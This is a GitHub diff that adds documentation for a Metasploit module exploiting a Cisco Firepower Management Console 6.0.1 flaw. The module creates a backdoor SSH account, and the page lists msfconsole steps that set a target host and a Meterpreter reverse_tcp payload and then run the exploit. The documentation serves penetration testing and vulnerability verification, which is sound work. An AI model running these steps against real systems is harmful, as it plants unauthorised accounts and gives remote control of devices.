File tree Expand file tree Collapse file tree 1 file changed +23
-0
lines changed
documentation/modules/exploit/linux/http Expand file tree Collapse file tree 1 file changed +23
-0
lines changed Original file line number Diff line number Diff line change
1
+ This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
2
+ create a backdoor SSH account via HTTPS, and then obtain a native payload session
3
+ in SSH.
4
+
5
+ ## Vulnerable Application
6
+
7
+ This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
8
+ virtual appliance here:
9
+
10
+ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
11
+
12
+
13
+
14
+ ## Verification Steps
15
+
16
+ 1 . Start msfconsole
17
+ 2 . ``` use exploit/linux/http/cisco_firepower_useradd ```
18
+ 3 . ``` set password [https console password for admin] ```
19
+ 4 . ``` set rhost [IP] ```
20
+ 5 . ``` set payload linux/x86/meterpreter/reverse_tcp ```
21
+ 6 . ``` set lhost [IP] ```
22
+ 7 . ``` exploit ```
23
+ 8 . You should get a session
You can’t perform that action at this time.
0 commit comments